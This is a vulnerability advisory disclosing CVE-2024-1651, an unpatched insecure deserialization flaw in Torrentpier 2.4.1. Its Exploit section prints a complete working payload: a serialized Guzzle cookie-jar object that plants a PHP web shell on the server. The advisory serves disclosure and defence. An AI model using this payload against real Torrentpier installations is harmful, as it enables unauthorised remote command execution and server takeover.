---
slug: advisories/xavi/
title: Torrentpier 2.4.1 - RCE
authors: Carlos Bello
writer: cbello
codename: xavi
product: Torrentpier 2.4.1 - RCE
date: 2024-02-19 12:00 COT
cveid: CVE-2024-1651
severity: 10.0
description: Torrentpier 2.4.1 - Remote Command Execution via Insecure Deserialization
keywords: Fluid Attacks, Security, Vulnerabilities, RCE, Torrentpier, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="Torrentpier 2.4.1 - RCE"
    code="[Xavi](https://es.wikipedia.org/wiki/Xavi_(cantante))"
    product="Torrentpier"
    affected-versions="Version 2.4.1"
    fixed-versions=""
    state="Public"
    release="2024-02-19">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Insecure Deserialization"
    rule="[096. Insecure Deserialization](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-096/)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
    score="10.0"
    available="Yes"
    id="[CVE-2024-1651](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1651)">
</vulnerability-table>

## Description

Torrentpier version 2.4.1 allows executing arbitrary commands on the server.
This is possible because the application is vulnerable to insecure deserialization.

## Vulnerability

An insecure deserialization vulnerability has been identified in Torrentpier that
allows an attacker to obtain RCE on the server. This was made possible by deserializing
arbitrary data sent by the user.

## Exploit

```txt
a%3A3%3A%7Bs%3A2%3A%22uk%22%3Bs%3A32%3A%22VH1LEjOTawqJ5RZcXzht2Ew1Z94vhgu9%22%3Bs%3A3%3A%22uid%22%3Bi%3A2%3Bs%3A3%3A%22sid%22%3Bs%3A20%3A%22VsZHWgRXmBhbsVdztxwR%22%3B%7D;bb_t=O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{s:36:"%00GuzzleHttp\Cookie\CookieJar%00cookies"%3Ba:1:{i:0%3BO:27:"GuzzleHttp\Cookie\SetCookie":1:{s:33:"%00GuzzleHttp\Cookie\SetCookie%00data"%3Ba:3:{s:7:"Expires"%3Bi:1%3Bs:7:"Discard"%3Bb:0%3Bs:5:"Value"%3Bs:35:"<?php%20echo%20system($_GET['cmd'])%3B?>%0A"%3B}}}s:39:"%00GuzzleHttp\Cookie\CookieJar%00strictMode"%3BN%3Bs:41:"%00GuzzleHttp\Cookie\FileCookieJar%00filename"%3Bs:32:"/opt/homebrew/var/www/hacked.php"%3Bs:52:"%00GuzzleHttp\Cookie\FileCookieJar%00storeSessionCookies"%3Bb:1%3B}
```

## Evidence of exploitation

<iframe src="https://shorturl.at/jCJ56"
width="835" height="504" frameborder="0" title="RCE-Torrentpier-2.4.1"
webkitallowfullscreen mozallowfullscreen allowfullscreen controls
loading="lazy"></iframe>

## Our security policy

We have reserved the ID CVE-2024-1651 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: Torrentpier 2.4.1

* Operating System: MacOS

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by [Carlos
Bello](https://www.linkedin.com/in/carlos-andres-bello) from Fluid Attacks'
Offensive Team.

## References

**Vendor page** <https://github.com/torrentpier/torrentpier>

## Timeline

<time-lapse
  discovered="2024-02-05"
  contacted="2024-02-05"
  replied="2024-02-07"
  confirmed="2024-02-07"
  patched=""
  disclosure="2024-02-19">
</time-lapse>
